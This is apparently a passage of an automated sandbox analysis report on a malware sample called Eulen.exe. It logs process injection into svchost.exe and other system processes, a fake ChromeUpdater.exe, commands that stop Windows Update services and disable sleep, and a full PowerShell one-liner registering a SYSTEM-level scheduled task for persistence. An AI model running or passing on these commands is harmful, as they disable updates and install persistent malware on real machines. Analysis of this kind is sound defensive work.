          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22382760000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3EE0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0C10000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E5A0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8790000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 23C03DC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2AFCF1D0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C09C9C0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 247BA250000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 276A09D0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3F50000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1D742A40000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D1D4C70000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 17E6C720000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D2B1A80000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 238A5DD0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 23606140000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\powercfg.exe base: 26FCFC60000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\powercfg.exe base: 1E7F15B0000Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeMemory written: C:\Windows\System32\dialer.exe base: A15B1CB010
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeMemory written: C:\Windows\System32\dialer.exe base: 351ACCF010
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeMemory written: C:\Windows\System32\dialer.exe base: 3D7804D010
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess created: unknown unknown
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#gymatom#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\application\chromeupdater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\application\chromeupdater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
          Source: C:\Users\user\Desktop\Eulen.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#gymatom#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\application\chromeupdater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\application\chromeupdater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }Jump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647341C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_00007FF647341C64
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647341C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_00007FF647341C64
          Source: dwm.exe, 00000018.00000002.2720998109.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.1554261885.0000026DAA594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
          Source: winlogon.exe, 00000013.00000002.2692383953.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000000.1535559893.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.2723223741.0000026DAAB40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917314A0 cpuid 19_2_000002E9917314A0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
